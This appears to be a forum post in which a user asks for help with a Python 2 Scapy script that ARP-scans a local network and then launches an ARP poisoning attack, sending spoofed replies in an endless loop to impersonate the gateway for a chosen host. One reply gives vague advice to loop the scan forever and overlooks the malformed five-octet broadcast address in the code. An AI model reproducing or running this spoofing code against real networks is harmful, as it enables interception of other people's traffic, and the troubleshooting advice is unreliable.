I'm trying to build a arp scanner script with Scapy. Everytime I perform a scan, I don't get the expected result. I get only two responses: one from the gateway and another one from my host machine (I'm performing the scan from a virtual machine Kali). Sometimes, I only get one more response, that's all. But, when I'm doing a ARP discovery with another tool (like Nmap), I get all expected responses (from eight machines). What's wrong in my code guys ? Can you help me ? :-(.
from scapy.all import *
import sys
from datetime import datetime
def Out():
print "\nBye!"
sys.exit(1)
try:
os.system('clear')
interface = raw_input("Enter interface : ")
ips = raw_input("Enter network address : ")
collection = []
print "Scanning..."
start_time = datetime.now()
conf.verb = 0
ans, unans = srp(Ether(dst="FF:FF:FF:FF:FF")/ARP(pdst=ips),iface=interface,timeout=2,inter=0.5) #Arp scanner starts here
n=0
for snd,rcv in ans:
result = rcv.sprintf(r"%Ether.src% : %ARP.psrc%")
collection.append(result) #append to collection
print n, "-", collection[n]
n=n+1
stop_time = datetime.now()
print "\nScan done in ", stop_time - start_time, " seconds."
if n > 0:
target=raw_input("\nPlease enter host to arp poison : ")
gw_addr=raw_input("Enter the gateway address : ")
print "\nArp poison on host", target, "starting...\nHit Ctrl + C to Stop.\n"
p=ARP(pdst=target,psrc=gw_addr) #arp poison attack starts here
send(p,inter=RandNum(10,40),loop=1)
else:
Out()
except KeyboardInterrupt:
Out()
try to make the tool work infinitely and use that code to re-print the results
I think that first result gave you the only this moment traffics and the Infinit loop will monitor all the result.
I hope you find it out ;)